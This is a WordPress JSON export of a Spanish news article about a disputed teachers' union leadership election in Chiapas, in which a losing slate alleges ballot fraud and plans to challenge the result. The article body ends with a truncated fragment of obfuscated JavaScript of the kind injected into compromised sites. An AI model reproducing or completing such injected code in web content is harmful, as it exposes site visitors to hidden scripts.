{"id":9070,"date":"2023-03-16T03:45:26","date_gmt":"2023-03-16T03:45:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9070"},"modified":"2023-03-16T03:45:27","modified_gmt":"2023-03-16T03:45:27","slug":"inconformes-con-los-resultados-integrantes-de-la-planilla-amarilla-advierten-que-impugnaran-resultados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9070","title":{"rendered":"Inconformes con los resultados, Integrantes de la Planilla Amarilla advierten que impugnar\u00e1n resultados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-9071\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-15-at-4.47.50-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal15 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Manuel de Jes\u00fas Mendoza V\u00e1zquez, quien fuera candidato a la dirigencia de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n, de la Planilla Amarilla, advirti\u00f3 que no van a reconocer el triunfo de la Planilla Roja, ya que es producto del fraude, la corrupci\u00f3n y la ilegalidad.\u201cVamos a impugnar el proceso, porque tenemos evidencias de lo que estamos diciendo, el s\u00e1bado vamos a llevar a cabo una Asamblea Estatal de esta Planilla Amarilla en Tuxtla Guti\u00e9rrez, vamos a concentrarnos, analizaremos y haremos un balance y trazar la ruta legal y jur\u00eddica de este caso\u201d dijo en conferencia prensa.Indicaron que impugnar\u00e1n la elecci\u00f3n para la dirigencia sindical debido a que hubo una serie de anomal\u00edas durante la jornada electoral que se celebr\u00f3 en todo Chiapas el 14 de marzo, enumerando irregularidades como las complicaciones en las Asambleas Delegacionales Electivas que se instalaron en la Subsecretar\u00eda de Educaci\u00f3n Federalizada, en la escuela Primero de Enero y en otras donde se presentaron problemas dentro del proceso, \u201cen lo general fue una jornada fraudulenta\u201d.\u201cEn primer lugar el \u00e1rbitro fue juez y parte del proceso, encontramos en todas las Ades que las boletas no ven\u00edan foliadas, los integrantes de las directivas de las mesas de casillas eran pr\u00e1cticamente los del CEN del CNTE y el Comit\u00e9 Seccional que encabeza el corrupto de Pedro G\u00f3mez Bamaca, buscaron maniobrar para que saliera ganador su candidato, todas las boletas no foliadas las usaron en varios lugares, como recurso para rellenar las urnas\u201d.Y es que coment\u00f3 el c\u00f3mputo hecho que va a un ochenta por ciento, arroja seg\u00fan los datos con que cuentan \u201cla Planilla Roja lleva 19 mil votos a favor, la Blanca 12 mil, Amarilla 5 mil, la Guinda 2 mil, y la Marr\u00f3n 650 votos, somos un universo de 70 mil maestros, de tal forma que si nosotros sacamos un porcentaje r\u00e1pido de lo que representa es apenas el 27 por ciento del total de la Secci\u00f3n 7\u201d.\u201cEso quiere decir que es un Comit\u00e9 ilegal, ileg\u00edtimo, que no representa a la mayor\u00eda de los trabajadores de la educaci\u00f3n\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal15 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Manuel de Jes\u00fas Mendoza V\u00e1zquez, quien fuera candidato a la dirigencia de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n, de la Planilla Amarilla, advirti\u00f3 que no van a reconocer el triunfo de la Planilla Roja, ya que es producto del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9071,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9070","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9070","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9070"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9070\/revisions"}],"predecessor-version":[{"id":9072,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9070\/revisions\/9072"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9071"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9070"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9070"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9070"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}